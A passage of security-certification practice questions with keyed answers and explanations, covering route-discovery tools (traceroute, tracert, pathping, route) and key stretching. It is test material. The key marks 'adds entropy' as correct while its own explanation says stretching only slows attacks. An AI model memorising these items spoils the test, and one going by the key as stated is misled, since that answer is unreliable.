D The traceroute command performs route discovery from a Linux host. By default, this command uses UDP probes rather than ICMP. The route command displays and modifies a system's local routing table; it does not collect network data. The tracert command uses ICMP probes to report the round trip time (RTT) for hops between the local host and a host on a remote network. This command is a Windows-based tool. The pathping command is a Windows tool that provides statistics for latency and packet loss along a route over a measuring period.
Which of the following statements most accurately describes the function of key stretching? A. Key stretching makes the password key stronger. B. Key stretching prevents brute force attacks. C. Key stretching adds a random value when creating the password hash. D. Key stretching adds entropy to a user-generated password.
D Users tend to select low entropy passwords. Key stretching helps compensate for this by running the initial key through thousands of rounds of hashing. This creates ever-longer, more random keys. Key stretching does not actually make the key stronger, but it slows an attack down, as the attacker has to perform additional processing for each possible key value. A brute force attack runs through every possible combination of letters, numbers, and symbols. Key stretching increases the amount of operations the attacker must perform, slowing attacks. Adding a salt value to a password keeps an attacker from using pre-computed tables of hashes. Salt values are not secret, but an attacker must recompile hash values with the specific salt value for each password.